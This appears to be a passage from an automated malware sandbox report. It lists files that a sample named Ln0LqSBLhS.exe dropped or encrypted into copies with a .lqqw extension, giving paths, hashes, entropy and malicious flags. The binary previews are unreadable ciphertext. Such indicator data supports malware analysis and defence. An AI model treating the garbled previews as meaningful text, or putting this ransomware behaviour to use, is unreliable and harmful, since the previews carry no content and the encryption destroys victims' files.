                                                                                                                                                                                                    Preview: ./.O...R....('>K. .X..(.C.b$.`..W_..-..\9.....M4>A-[.z.....p.O....Y.3|...[l...l.......o....A.6m.F..8w.'O2...>*.c..j.......d........H....R.L.....k\.........R.t.........|...2p...n....C..`'....NK..".g.......X..7.)...1z......[P.y.g.K.Y....*.....p]....._..N..xc...Ps.!kxIb.O..\9...e...nE.*.GcC...........a.......T....5...'..u..*zH.{j..?H......I...M.-j.jy..._*m.Kf.I.....52Z..1.,@. .Y.0 ..w....=....~...I..v.7..m+s./C.Y...s.....`........(.....e...*._1.~...u.q../N..O.X.bX..S......`...=#.vUw$!P.A.:..t.,*.`.(..!....@ .=6..g6Wn.R.,..+.<..Z...._...Xb2...5...J..M.R..%90,u.o..".Ch....D.Y^B{ ..Y.rk:D.+.F...P0ac...;l.Kr.....S.=.*.j\.1oE.)~P....L2.S..eZ.o-....g.............'C-4.1F../V.HY[sqC......B..+MY....y.-......|..a..[.........z...'.....Y.l3....{7D..hmC..uO..'.I.....Qc.~R.(!P.Onb.P...TL-.;..&>...S.k..T{7.1\].`.7"k.5...m....4.)x....[.&.,.1......b.Xu.jgZl_)`J...|..@....M.M......](u.^i32..O..,A.a.#Z.T.....S[<[\+..c......]k.i#0.:.?d....^.b..
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998819587300934
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:JL7Tmvr0RUBKNtbBjVMeirjVIEdGt1QJ9UpYdoEfIf5Kgh00:JTKAgU5VMrIEg7IkYdoEfIfogl
                                                                                                                                                                                                    MD5:4F11EF5ED3A148FB67CA0B92AFD7EE52
                                                                                                                                                                                                    SHA1:B5BB0795A615376D3CFFFA7B1326D5F4EDAE8463
                                                                                                                                                                                                    SHA-256:519F4EAEB46270530B581BFCF0D729F0637E2205C70C1D88CBB2D70F45AF16D3
                                                                                                                                                                                                    SHA-512:9AAC37EF0A32CB4CA3819FEFECA025E9DC3BAAB58637AD547C0AAA79690A4823BFDE9D707322DD6B82021E391F3327B3F802532D23D27C428A788370CEDBA818
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: x.a....Z.V.nw.......`..o..t.%..{..,]....JX!'..j~...^.W...*^.Vz..8.../.%.8..Y.'h...I....b!a.......a...C...{......`....H..M'.a...Q..U)).NO.*...(.<.C.@Dc4.+..p...^`.<.Ys...6....9..t..!.&T8.....$..|...G.o..+..C...?,.......".FU..G....(AH7......-5......R!..,...D*..)Q.....s..(.*..U....S....:.Uu`@ydO.}5....".?b.K.}?@...B...>....#....q0*..........).&i.s......"4...*.Qc.f...N.....t<......RE..s...=N.6>.p.F...9......9....X....lE..8K~.G...9YK..[.>.T..~.oK...].nL....9....f.sGN.w;......k.FF..._...B.A.K........'...[.t.A.......f.Z..SF...4&.S..2J...l.%...\c.:tK....o.x#.-..De..\....}.{...1...~pW.n.U.D...h.b.....>.Q...J.......y...4p....*%G(K.Q..|...;..}..z.6...sHn..9e!. ..&.~.G....u..h....].x...7.......Hl.U.1Tf `.....A..=..e......=H<...E.=.\D......M.8.... ..i~Y.XG...#.N.h..o.....B.1..\+....[e.+.s..,.O...'..C..@.4G(......0t(.yD..P.B. E.L.s....W~O.CpJ63.T}8.f~.]Z...H.'h..t^..b.A..v.3y......m..0>XB........B.....n.@..J.f{....h.......D.^Ka..C{.e....&..Ar..
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.9988537146772485
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:tNe00qVDDAGQXw5NlIX4fAZPmm7yHW9lflj/X9M5A/Uny3/G:tNZ00D7lIXbVm9Wbf1/Evy+
                                                                                                                                                                                                    MD5:160E96FD3F16BFF922754209DE47C135
                                                                                                                                                                                                    SHA1:83E6F5A5D79A6F50F3D76E4902637B17B39D1774
                                                                                                                                                                                                    SHA-256:E2855738F9FB114E7003157100DDE34C9BAF5760F971CC947722708CFE2E9114
                                                                                                                                                                                                    SHA-512:1E234035DB4F11442A76FF3D1B1F0E481928B7E1A09EBD23C0A57F664B2A8395E8F1C693CACB89DE22259D6F444CDEC303073851298F8D09FD61957279A0F15A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: L...pwrz.....=....eRI.C.k.&..8..B.pj.uY....M..hX.M...DIMs....eG_.}N..2Q............F..P.Q.......u@.R...:.&u...6#4..z.]/E?_b...g.P.%;QQ..c.....,d%2..y9.ZT.....i...m....V....8..c.......Z5.J.cK.n{........V..5NG.3.!8.....h.}W.BE.;RKI.w..u.....t.o..(A..D..[..X......."..T....+..t...5....8....Q.Z+.K..R......"T...nbl..;kYR.E..f..dp......P.[..ePu.Zzy.#.;N....S.....q.?.t.O/.L.8vK. .....B&...#..^......:.O....d..G.1$X ....t$.Lb)......'S....DA.aJK<.w..'....z.{.i.KeJ.m..#...OEi[0.g.............A8..5d.3.l`..;O....N..I..E..8.$1V3Ma.......E.i......`..`>..M.ZT..c....z..v+.....`.T.....Z......}..#Y.@.Z/......H5p..G&'(..|....F$..;.M......@s."d.z.!.......$.$*...m..:..E....)^..Pt..-....H..H..xY..h.M..'..f.y..X..\.fT..C..T..O..c.,.../.B...z!..!....#V.p.`h.Y.G...X...6..{........R$:...<4.........(%....%{p.a..a0.z..H..O8~.E..Y..e&d.rK.^A\..y0..j.p7D.../...s......B..... 0y_:.....Y..7A!X..%..~..d...R..t...jo......;Ht.wm...!u.l....hp.=I.5.].>n.7.I.d....bD1}g..|..
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\SIST02.XSL.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998803011341882
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:ANhxf123SfwZvZ698cqqdCdVlOMz/oA4ka82UDJJ7vZEq4:ANrA3c8JcqjdVU8FbLvZEZ
                                                                                                                                                                                                    MD5:98295A9FF831DABCB9AB433A4B75015C
                                                                                                                                                                                                    SHA1:E5B9DE9BB7A0C150B5E853F3F1C8569E2F976A6A
                                                                                                                                                                                                    SHA-256:CED50508F40AE56E621E4F1F7CB3221486BE1B47839F0934C52273FDE86FBC8B
                                                                                                                                                                                                    SHA-512:9920E873A125FCB891861CCB5567C5DA7025CDD9AAFD3E655C2494645465FEE9F7B012F47BEC313643E8F891E54129C97169D254BFE6254C2930ACC829A13DB3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .c.&.!....U...~..~...._].....),@....!u.W..9..s.yq..d.v2..t...?q>%X.B).q:..z.._..).^.2....%..f...ZJ.......'.f.[Y..@...&.,.h.r...d..X.S.....j..j.4....^....K......l...#.]9>........V-..bp....U.L....e...-.1.}.[.....nf........s..g.s...[.....Z._,.QRF.^.....&B.Q=........".|.$.7..%..$.._.=.B/.+~......%..).5......UMklBnX...{R1..j...q. <j...?..H..pZ.y9.Qd....P...j.!_..vyo4.....D&.s."....&.w7....v.E......5.._PqKc.......6"R....C.... ..oC}\...N...(x.F.4.Q...c.4..\.W1X..|........`..{w..A.^r..{\...$...xzR....c....a...X..t.e@f1..i$......=.Z...kI.....G..4..gt.{..Iil6'q...D.n.B.Y...R..9.....[......I......A.....igh.m.&..H..Z.8V.xs.T......)......+e............cX.#..=..0....8@..)....3.E_"w....B.h.&.f.....o.B.J......p..4.2.....J.........<....$V...f8....d&.6Al.ff.[.!.Od...[MU...F. ..q8.H..:TO......K|+.....n....~.7. ........9....W..y....@@Y....\....o....t.`.l.,...N.Y..u. ...=..P......C...l...]....)k..pA...!O.gX.q.2c.P...g.....3....3...C...4S8<T....!.$M.
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\TURABIAN.XSL.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998691797753759
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:AyqbmYxiDK2NM0w/VNGllm0pGneyGRcspn6YoCsyE/uz74ZpCIgzBK:YbmYxid6VNEmmxnXoTyz74ZpCflK
                                                                                                                                                                                                    MD5:67F2048AFA108A737E8BCA282162806F
                                                                                                                                                                                                    SHA1:EDB187FE8D719CD9A5888150699C3DF432884CBB
                                                                                                                                                                                                    SHA-256:F0775898635D90A7DD5B59CBF5D1812BA408A1D25F7F4C0C15532FC0BF53F59E
                                                                                                                                                                                                    SHA-512:B9F7AD542AAB16060BE008FEDA7051FDC0F21A18C7E78C60E7A29133D4C96C54C4EE145B7FE0E9CEAAA286C45EF933CD5509CDD87E1294940E7B010F708A11DF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .3...+B5...:.."&...>1..m.#.j... ........ ...>C.{...aD...^.{.H....j.......=~mMa.....j.. .K..Wl.......S.z.{.4..=n..c=.w`...*... 9A..$...p..3......z'......>Ds..*;IS.....u..H.......B..".&..W>.....dT...0...|.A. .......~...R...O...op...E.`...C.uf...o)....x.}avK<....!.fr.0.....m.'.S....6T|..`..M..w..j.L.H.w..3aA.........].<....Z.b.-lX.3*.U.~...)..(_...o.z...:...t...<............=.a.|._4V*....LC+.&..J..;%..e...m...........vhz.. ....V.n<[X.\..E...r.T..'...(&L._ *.v...;.l.d%?O..r..&.....b..[bw.iZK...0.%::X..>B..g..45G_....t.v..8?...X.3S.}.{C......f.C o>V....5.dX..&..-q.g....+.(t................R[.....M..?..A....:.....!..`V..k..B....2..9.1+_...'".O.fo@ ..7..v....Q..=Z.(.P..t.:...NS....b.^]s.....>....(F..p...(..s..8!..!t.......@....yQr{.x...rBx%.DS....g1D.YL.6.{!...:j...PPW..*l-.(...O.3X...Ou[.D..!.-m..!.p._2..J...-.^.*../P.-....-t.<.2...:....5......}........G5A.....p!.8c.1....i...})9k...8.1N.h......k..5...k_%>.Y..D..6L...pB....T../L_.i.q.k.....pI..
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998869516247606
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:m+rZ4zqz6RsJATMIY6B3qcYcxISLT44mIzA/miAl51r2OQSpQjG:mMZnGRgIY77Sw4mIzfpSSpQy
                                                                                                                                                                                                    MD5:A35276EB422642324F9FB8754C79F4A5
                                                                                                                                                                                                    SHA1:5D47FCF378672D8587EF17B89D3058B5CA66C4D2
                                                                                                                                                                                                    SHA-256:A2F14F1A8F00C59FF06D46FF941B63D1F9A58F2B2C4FA3BC74A00C1313C33820
                                                                                                                                                                                                    SHA-512:EE3BDCC0A1F0F1299FD2E13EE0BBCC63750887A832CE987C34DEA828F6E620EB4B7D133D2A93566C94C0442B5703D49C22E4181B2F083155E8F3CDCD69474BC9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .zB..lB...N.?Tu.p'.0....:i.V.lf.FuV....... z.....l....:.z5J.@....x..A....Y..&',w.Zl....w.Jj...<....-}.m.U'...u0.......@.U....~D ......{._.......os..<T..u..k&...bB..oi.6....Pa.;Y.L.[C...c.}M.....4}....q....].fH(.aT./....9.....9...77........*"...]...-.....C6(Q4..s.E.M.......3.~v6..P.xIa..n./[...y.9..R.&.>...U.Lrd.#._...A...U.0.$..M.....EkM.S.......q.......{...y4..E..."m.*]p....G....PN B...F.....R..........L..i......I...a.^5_E'X.~.6.~2..M.?.......\wA...7.d`.m..cL49s.G.e......k..'<.}.y..k..[.U|<...R.^R.c:.O.!2.v..b...v.7.]S......c5...-.....R.\'....zv?..k.|.G.1#?e....{..t.H..;.S.=.c.. ........." .=......1|Z~s.....c.M....N(.gh...'..]z......{.....{....&....C....Yad.......,...x...<." ...N2|J....K......R.H9...0...jt.W..3=..=y.:._^.$.rj.....aM...3[.N.[0e..G`P....+N2i.....Ae&...7..*...X!.J....O..{U....@.X..e..S~...;...........=..$f..B{U..........w0=(.e.?..X..YC,...]_.B`.E.b...\..8..a......s....h.T.....J..P.+..U.....&<..A.q... ..YG.,C..7Zg.>.f9x..
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Office\MSO1033.acl.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):38059
                                                                                                                                                                                                    Entropy (8bit):7.9945159914987265
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:m2okgp8AHDxBcw+ouTQWAxfsdiBpbdNyN91Z7Vf9YPirt3OGxYBfev7TiGW:m77p/j/cyuTQ/9pq7nYKrt3h9v7TM
                                                                                                                                                                                                    MD5:9327A5DA830692239BBE4BC198E9A4D3
                                                                                                                                                                                                    SHA1:F5584CD095FCD8B9123A75A1AB8BE7914D207A88
                                                                                                                                                                                                    SHA-256:9482894A26DE43B4852D9F634B11237543E826C3660BA7FD15AE4A52C22FA5FF
                                                                                                                                                                                                    SHA-512:F99B09FC6FB86441B72377AB87EE0207B90362F8F29006731D6966A9CD0564D55D73F8179F35104AB90434C53290A55B5400931569DFBA95F7D677193C86966C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....MN.[`.*.f.K.C...DUkn.G....U.....}.s/a...r.P..+.+..\.sI....T.AV....6.......M_...n.../!....37l..l...{..{m....t.5.wK..C.{`.~..".Iq...J`..... .F.ug..Zs....Bs.g..*.a...+.......}..[...[8E$]a.\g....c.l..........^.-.__.....b..\w.>.l.,Q>f{>U.. ..xF....D.y\NV`{C.k.>N......B.'..q...)......wR..B,.}.ik...;.2O.>.........M.\.J0t.Z.r...I._...|._@..#..l+.C.....@=9EQi6.oC:l&..,.:.^c....v.I..r..rL.WL...1nu.>....h..lb..}m6..b..d......%.v...)..xM+`...%!.I.=..q...........'RSk..vI.#y/...XA...o..4..o.7QJ.,`E[(e.L......h#r~_{a.:Q.6r...!....O.Vu@.Hd...^.`..u....B...........Q]a..=/.Kc}.N1oSr.h..y....\.....g..._hB.fl.........A..R....Y.e._&.[..54`7M.sC....y....W.~..:.f..g..5x\....18.......&..['...c.Q?.O.{ .X..*l.R. ..M..!.6..W..Z....07.z<.pv.q.0g'.kh./KvS......ru...e..j.5V...............6|N...[..+....f......T..~.;...w<..J.R..xR.7....0h..f..].F...~.......zIML.?...B'..9.T..Q...ep..d=zG....[k..L..i..=q..c.W&.....L?.D.}..RI_.g...J).}lF.J}..in..~u..
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Office\Recent\Templates.LNK.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1493
                                                                                                                                                                                                    Entropy (8bit):7.8608408452517935
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:UVVEGMRXoRzuLY1MlX4m7ha2o/B9+R/WTnkMSvCXHYM6lqsYG4BQ/eM5EbD:4RMYWGKhQltSvCXHYM6lqsYGZ/ejD
                                                                                                                                                                                                    MD5:D340917A0589964A0E3894340BA52D05
                                                                                                                                                                                                    SHA1:56ED4D92B5DE2831AEBB8024121781A487BE62EE
                                                                                                                                                                                                    SHA-256:D1C2E3B1EE26CC9B8B9FD61EA984B58DAF48D7BB8D782FF52E69D8BD01A3AA61
                                                                                                                                                                                                    SHA-512:77C90EDFB9549D7B6BB1DBBDD3A7554200AD73828C505AC3FB0C0AD39282F7359D93ABFCD8F0891952BCE4BCBE23A2E3B2AD2654A1D06CC03D7602FDFDF26AC5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: l..fgF.D......o..O6..q'.8q......tt...<_3,N2..=.....!7q....e..k..e....+.a..:a.{?....P........b.....C.{.@..k.;..B.0q._...'........P....w.&d....-(..*...d.1..X...ts.Y.9Y...Zk.G.....@J%.....a7lC%..J$''d.}..R.9Uo.P...5..H...?<...:...8D..Osh'....X.x.+..`.NJ|.............-..}..Nq/q...?yG...8....'z.)g........E..e..n../........l.bZ...f.G..,.o.1....F..(......J.90.....G.;...a.....C-.(.BD.y...IE(W[;.....@M..V..,...|....L.F..=.1...06.S.]!...u.Fi..C)\O......d...=.F...O..o.....b..B(|.k..?......S%K(..q...+t:.q.....';..H/.\#8.~H.SWK=D...Z....'...'.0.|-6._M0Z4.....*.......7..WWU.....-7.P...GuY.2.FF......L....m.Pa.5..c.....&8..~V.4.].P.S-oV..(b....iq...F:.2VG..._\D..cP .M.....,.$.....e...S.%j.1.....[....W...+.._.x.z....B....{.,..c._...1..~.0#..h>...2............r.x...HV......ob..(.uY.n.K.............V...;M5...+>.......\.....TM;....B...N ...X._."-.3....Zedk..Z..o.<.t..&..Z.k..i>.v.+X..].>.....q`i..{.].,...p.~G....o.;.-.:3H..O..Zs.*..>&o...t.....T..4b...
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Office\Recent\index.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):357
                                                                                                                                                                                                    Entropy (8bit):7.237299611815208
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:0qlTw4VJdShobzLxM0P6HtBS3uM9MFGL0XAlSkwtH31UvKleO2SVelnXH75dExcq:0qyKxZetBECFpATv0e/Xkcii9a
                                                                                                                                                                                                    MD5:7784007FFDA0FCB5CAF08ED139DD0DA8
                                                                                                                                                                                                    SHA1:23097B25E3B3E1293E809C0EDA179DE54ED7ABE2
                                                                                                                                                                                                    SHA-256:96B4A814280D1630DF555945169DC6F526C42447D904D6A092ABA35B6E69931B
                                                                                                                                                                                                    SHA-512:6FCE484A0D7D8BC8D58894583B9713C28152891417785194987C73EAE09457C3A5B8CC124FB866E7D9D3C7FE433EFAB50D53071EF1E28EEFA70BB9B5273242E6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .h....vxR.K....j.{...\].6.P[3.4.~.*....aaA.T.)...?..}~...tVD.f".....C.`...$.`J(Q.~.L..7..........`W.</iy..3..\.....)CL%...).._:.}.I.H...,.$S._.2...6/.~Y..D.....H..IT..e......M....9I......#J..").......z"o"..Ec..-..P:._.o..+......}1..q.}.p.2Y.8..I.h@....h..J<....i..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Templates\Normal.dotm.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18267
                                                                                                                                                                                                    Entropy (8bit):7.989494919038788
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:hbTGOHspDFrCRRYQdBgTGZOXvgsz1CohV4+i:rsKRYyRcvglYVbi
                                                                                                                                                                                                    MD5:063EA6612B457A7D49D1D51572742F61
                                                                                                                                                                                                    SHA1:7406B0DB5CFBAE0ADB5301EA198815499726349F
                                                                                                                                                                                                    SHA-256:628A39F2F7B3B3BD791EA945B77EE20EF0B979C2FAC7654343F6EE49E5224426
                                                                                                                                                                                                    SHA-512:CF1BCF31D11FE1C535970E85FDBA5574E23D5BF09D74435E32674C5A920850BC20B54D5BE8E00D07EFC90B99F3A603F82A31933D6D90B4F0D1853B77F927BA4C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: }...*2S.~....!....w.%d,Z.N.b.XD..I!....k.K.3.NN......&2)....k..*K.@&\...bBt`5.."S}J7k..?x}..DC.....`..2.....`B....L..a*s../............."....P:.Q..7.FF...*.W....;f.3R0cs.J$.v.f....cz.{.....*\..".6.7....mI..N*.....G.qPA...g.s..:.r9PD".~..N.kfe!....NI4........u.8.Wh..f.dB.Y.:cG2.Q.^..KiK..]%...2.f.G....."..ZR.D... (..\..8...}cph4^Q....*[g&......lQ....k.gd....~..0...B.M....^....E...+.)yf'd.w.....V...]......,.yyU......t.J.8..9G.....[.yO..tr.......^..t;t.Js...k. .O..|.1.&.;B.....Y.n...u.r.c.18...;D*_..ro....YGh......IjTW..}.2XF...T..=..`}...'.m..(..lz.T..._F.........%.Q..8O.>rbR..;....{h>v....\. ..i.!~.2....t.l...9..1.7T.h....a..8...S....L.$..tRE3.M,......u.+....QI%..Q........Vu......+z.e.01?...R....eo~...k.U..A..A.:...1{...i....I.......y.O.3..Aa.4trU....._q...a..q.2....cq.jWjn...Kj.0.Htx+"..rp...F..N,.g]...?N4.a....../.".[....-..v2......o....`v$f\..?...O&.0.6.T....a[....._1..s.2..6.>...."...s0......e....JJ.F .....M/.P$....8j2@..]..ic.t.h...
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\UProof\CUSTOM.DIC.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):349
                                                                                                                                                                                                    Entropy (8bit):7.233354216498113
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:GyHSOS7sa+bmFjtl6V502+ynbDn083oAv1KPBftvP82J2uhlc75dExcii96Z:0OS4NsfynV3oegftcZuzVcii9a
                                                                                                                                                                                                    MD5:9C98EEEB39B6A9A9CC4FA1639128DBFE
                                                                                                                                                                                                    SHA1:53FBA23D5A8506209149B2C2A8FD960932715593
                                                                                                                                                                                                    SHA-256:9D2C10E21F033FB68F1EBFD73704166E4953B1D992D36F28DCCAEBF3C9EE5E94
                                                                                                                                                                                                    SHA-512:AF65DBE7FDFA2E8C84EEE9C119408B5E7E52281CFE5EB369034C267D7E8BFCF88689C2E888893765F563AC3E80679143B8F02F3F4004A65C0FD373C06CB7B2D5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....b..2.p...K..TF.p.....J..E.U...{V.D.v.......R.9.i.j...j...].>.R`_P)C...+.p.j...U..a..S.-U...j9...W..#V.l..0.......'O....!v..........Y*c.l.........l.7I...3.V...u.P.Z.0.34S]Z..|.7.G.....]_mGNX..A.^..\(..H....7U&o.jl.... ...O.........p#._.....y..1@......S.@.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Windows\Libraries\CameraRoll.library-ms.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1347
                                                                                                                                                                                                    Entropy (8bit):7.852789755134879
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:4HuojpoE90+XPeqI4xilz0DdyvHS2l9mtlmkMsZ9KguvAbpHxja8p/ftebD:4HuotoEO+X/zilz4dyK2Tg2OH9a8JKD
                                                                                                                                                                                                    MD5:B2DF0AB6C21360212241BAF2F26C4D8A
                                                                                                                                                                                                    SHA1:B31ED0EFE1A6B3C73273E84C6B32C9260A80F136
                                                                                                                                                                                                    SHA-256:DB6A16D440C019875AD7DB7F088F765CA9E88F06145506F4BC6534820A303873
                                                                                                                                                                                                    SHA-512:871024D8C89A5126A605DFCAE5AC9E98E0469EE3BB169A33220FAD28BC787ED720484A5ED56145625A16028D4956725D4197D63553F074A4E041B7A4AC8BF290
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....Wv.?..<].w...............O.!f........<.??6..$Qq........G.....B..>N...}.s.b.:...".9.b..e..:w.=|....1c..V`....].D..|.....{..=.....~e.f.........~...6K.+..@K..<.G_..b&....^v.I.Rf._..?s.?...7...8.^..... ......%.s..#.u.l..@GctdT.8..M.1.P.."...B.k.......Wy..t.i..O.&..R...u.......g.r.5}.&......M..m....v.$C.;qAe..~..r.mh.;.....u....:F..h<N.=..v.a......i..A.n.t......U....DF.|.Z..w......_7Y.I.!.....;......(Q.z..X..k...b6.Tl.O.....o@...}y..9......RF.P....x...Ur...g..p...k........!zsA..v{....;T....B.d...@..@.....0T..}a.f...e.8...THf.:.g.......'G.[zX..5f...H...?..g..'.0!p.........E..K3.%....}.cc.Z..8J.w...g.....2..M..0.Z.@.R$.g..t..w.8#.m......CJ.-.#....l.y(....q..x.%.{.i...V.p..b....F..<Kx.....F....$9QZ.@....;.5,.c......n.&:M. G..a.$X?.`.?..AVNQ.N...h....*+..........$........'V!D..}.J..A.....8(j5..s/.........../.D.....)..vJ...h..e..X.7p...7d.P?3........E.._....Y.%..G..>Q..`...u....]..:.D..bU;.7.fE..o.......U...M&/[V.~....pb.qO.g..w..@.D2...
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Windows\Libraries\Documents.library-ms.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2419
                                                                                                                                                                                                    Entropy (8bit):7.919607768577544
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:jUtsmI/qneI2/m05WckUoz69l/rDPYYxoct2+ZsKErYED:jdnqeX75MUoeZDPYYOc24PEUQ
                                                                                                                                                                                                    MD5:6EFFC4974013AE03059DC39929475960
                                                                                                                                                                                                    SHA1:5C6526A7BBC21479D1FE0581567F79C16CBCC8FF
                                                                                                                                                                                                    SHA-256:9F915659E7F52509C328F75C4293CF2E328676442BD9DCD40CD0E32E06473D2F
                                                                                                                                                                                                    SHA-512:C1716F7F6E0427B1D33D36F72C49F379453DFB5171086B653DAFC3C17286F93FBB03CF0C25D274B15B54687CECF2F396365A21D0A4085BEBAB62040FDC2D812C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: |.....]..cS.f.TQ.|].$h.7..q_=/j..(.A..)...89..y...<.?..N.@.......7}r. ..11!...q.^"sd..]....$.!q.X.$...0F..............s.......|...U...^~B....5f.*..l..E.G."n.....&.Z..-&Y%.dR-.R.b..OP.<p...v.UB....l.J..i.a.f(.Ap..`+..j....Y...h_...d|.....s....2.M.F.....T...'.(Hh..ul\...J.x...T~....x.hb......W.........n.....w.lb....K.<..>Z..lp;...>..4}....QK...u..J.=....V...%....0..r#R..uE.vb.J.b].n.'/tg.c.f...I?.._A.|[6g............P@..t.e..`.u.....9...H.}."=.E...C..Q..a......[.....(.{.rf.._dS}.s.8...1.\C.m.sO|.w.7W..b.t^.H.u....%..ml...*...I:#..|.a .........^...K. .-I.@....a..A3.J,..../.s..{.o....+C.Qu...8...6.}3z...D7.XM.?.y...B.q...........-...o.....a.h......K.....wL....V.B..Ne.K...Z;..L......\.HeO:..F...!..A.....n?.^$.3..>.!.`....w.."....<E..r..A2.<\ ..A.L..*.}..;*..2...5:W.5.~."xT..>.wO.U.+z.*..=H2l....>.n.x.UE*Epj....?7..p...q'*."...6....2M.k.h.el.@.I...)....#.....,}.........Z.1.Op..d....OO....2@.........=...C..i-I.....zF.D.|=.$...x...sso
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Windows\Libraries\Music.library-ms.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2376
